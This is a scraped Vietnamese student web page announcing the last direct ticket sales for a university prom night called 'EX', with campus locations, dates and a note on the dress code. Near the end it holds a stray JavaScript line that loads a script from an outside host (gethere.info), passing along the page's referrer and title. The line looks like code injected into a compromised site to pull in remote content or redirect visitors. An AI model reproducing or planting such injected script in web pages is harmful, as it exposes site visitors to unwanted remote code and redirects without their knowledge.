NEXT EX THINGS: SĂN VÉ TRỰC TIẾP – NGÀY 06 & 07/12/2016

0
1294

NEXT EX THINGS
Người viết bài này là một sinh viên lâu năm của KHTN. Đủ lâu để hiểu cái mắt chữ O miệng chữ A của mọi người khi tôi khoe “Trường tao sắp có prom.”
Không biết từ ai hay bao giờ mà thế giới tự mặc định rằng sinh viên Tự nhiên chỉ biết học? Ai bảo rằng các cô gái Tự nhiên không biết phân biệt giữa giày cao gót bình thường và giày khiêu vũ? Hay ai đã luôn nghĩ các chàng trai của KHTN hoặc mắt dán vào màn hình, hoặc tay chân luôn lấm lem thí nghiệm?
The Prom Night EX không phải là một sàn diễn thời trang, cũng không phải là một đêm tiệc thượng lưu cho giới “2%” (2% dân số thuộc dạng giàu và siêu giàu). Đây là một đêm Prom, để tất cả chúng ta tạm biệt phong cách ngày thường của mình, thử một điều gì đó mới, lạ và khác biệt. Đó chính là cái tinh thần “EX” và “NEXT”, sẵn sàng thay đổi và thử nghiệm.
Nhiều bạn inbox cho page có vẻ khá lo lắng về chuyện trang phục. Thoải mái ra nào, các bạn chỉ cần nhớ: formal, xanh hồng trắng đỏ đen, vừa vặn và tự tin. Thế thôi!
Và gửi riêng các cô gái, các bạn có thể không V-line, không mũi dọc dừa hay vòng eo 59, nhưng có sao? Bạn chỉ cần cười thôi, là thế giới này đã xinh đẹp hơn nhiều lắm.

[SĂN VÉ TRỰC TIẾP – NGÀY 06 & 07/12/2016]

WOW WOW WOW

“EX” chỉ còn 200 VÉ cuối cùng sẽ được bán trực tiếp ở khu vực quầy vé được đặt tại 2 cơ sở:
+ Tại cơ sở NVC, các bạn hãy ghé con đường HÀNH LANG CẠNH NHÀ I nhé!!!
+ Còn tại cơ sở Linh Trung thì các bạn hãy đến dãy HÀNH LANG GIỮA DÃY D VÀ DÃY E nè!!!

Tuy nhiên các bạn nhớ lưu ý THỜI GIAN BÁN VÉ nha vì Ad vừa nhận được thông tin vì trong khâu in ấn vé có chút trục trặc nhỏ nên “EX” đã quyết định DỜI THỜI GIAN bán vé trực tiếp và nhận vé online á 🙂
+ THỜI GIAN BÁN VÉ: THỨ 3 (6/12) và THỨ 4 (7/12)
+ Sáng 9h00 – 12h00; Chiều 14h00 – 17h00

P/s: À à các bạn đăng kí vé online chuẩn bị kiểm tra email của mình đi nè!!! Hình như “EX” đang gửi thông tin xác nhận ngày mua vé của các bạn đó nha!!!

SẮP HẾT VÉ RỒI!!! NHANH NHANH CÙNG AD ĐI SĂN VÉ NÀO…

Hẹn gặp các bạn tại “EX” <3

ve

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

CHIA SẺ